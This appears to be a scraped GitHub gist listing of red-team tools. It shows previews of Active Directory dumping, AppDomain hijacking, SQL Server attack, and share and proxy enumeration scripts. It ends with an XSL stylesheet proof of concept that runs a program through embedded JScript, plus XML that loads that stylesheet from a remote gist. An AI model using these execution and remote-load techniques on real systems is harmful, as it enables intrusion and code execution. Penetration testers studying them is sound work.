Scott Sutherland nullbind

View Get-DomainInfoADPS.psm1
# -------------------------------------------
# Function: Get-DomainInfoADPS
# Author: Scott Sutherland (@_nullbind), NetSPI
# Version: 1.7
# This script can be used to dump interesting
# information from Active Directory.
# This function requires the Active Directory
# PowerShell Module, but the script supports
View gist:32f6ce79c7049c3b7d33a9ed0f371227
Source: MSCBBLD4459.iccu.com
IP Address: 10.9.14.65
Date/time: 04/09/2020
Logging/Data Source: Process creation events were logged by Carbon Black and by native Windows logging to event 4688 locally. Windows events are logged to the local machine, but the current WEF subscription does not include event 4688 because it's too noisy. However, Carbon Black is capturing the events. PowerShell script block logging is also enabled and generates 4014 events.
Data Source:
Log Level: None.
Detection: None.
Blocking: None.
Alerting: None.
@nullbind
nullbind / AppDomain-Hijack-Inveigh.cs
Created Dec 15, 2020
AppDomain-Hijack-Inveigh.cs
/*
AppDomain Hijacking Execution Method
Payload: Inveigh Wrapper
Description: This can be used to run Inveigh through appdomain hijacking.
Mitre ATT&CK ID: T1038
Author: Kevin Robertson - Inveigh, Scott Sutherland - Wrapper
Credits: Based on techniques by Casey Smith.
Execution Option: Config File
View MiniPowerUpSQL.psm1
function Get-DomainObject
{
[CmdletBinding()]
Param(
[Parameter(Mandatory = $false,
HelpMessage = 'Domain user to authenticate with domain\user.')]
[string]$Username,
[Parameter(Mandatory = $false,
HelpMessage = 'Domain password to authenticate with domain\user.')]
@nullbind
nullbind / Get-SmbShareInventory.psm1
Last active Aug 20, 2020
Get-SmbShareInventory.ps1
#--------------------------------------
# Function: Get-SMBShareInventory
#--------------------------------------
# Author: Scott Sutherland, 2020 NetSPI
# References: This script includes code taken and modified from the open source projects PowerView, Invoke-Ping, and Invoke-Parallel.
function Get-SMBShareInventory
{
<#
.SYNOPSIS
@nullbind
nullbind / Get-WinProxyInfo.ps1
Last active May 4, 2021
Get-WinProxyInfo.ps1
# Work in progress
# Automation goals
# 1 enumerate HTTP proxy configurations on Windows and AD domain joined systems
# 2 parse the proxies
# 3 test for unauthenticated outbound internet access
# 4 produce an inventory of available proxies and whether auth is required (proxy_url, proxy_port, proxy_source, authentication_required)
# ----------------------------------
# Get-HttpProxyInfo
# ----------------------------------
@nullbind
nullbind / PowerUpSQL-Dc-Without-Creds.ps1
Created Jun 30, 2020
PowerUpSQL-Dc-Without-Creds.ps1
#requires -version 2
<#
File: PowerUpSQL.ps1
Author: Scott Sutherland (@_nullbind), NetSPI - 2020
Major Contributors: Antti Rantasaari and Eric Gruber
Version: 1.106
Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server.
License: BSD 3-Clause
Required Dependencies: PowerShell v.2
View Send-ProtocolHandlerEmailLinks.psm1
View xsl-notepad.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
return nodelist.nextNode().xml;
View xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>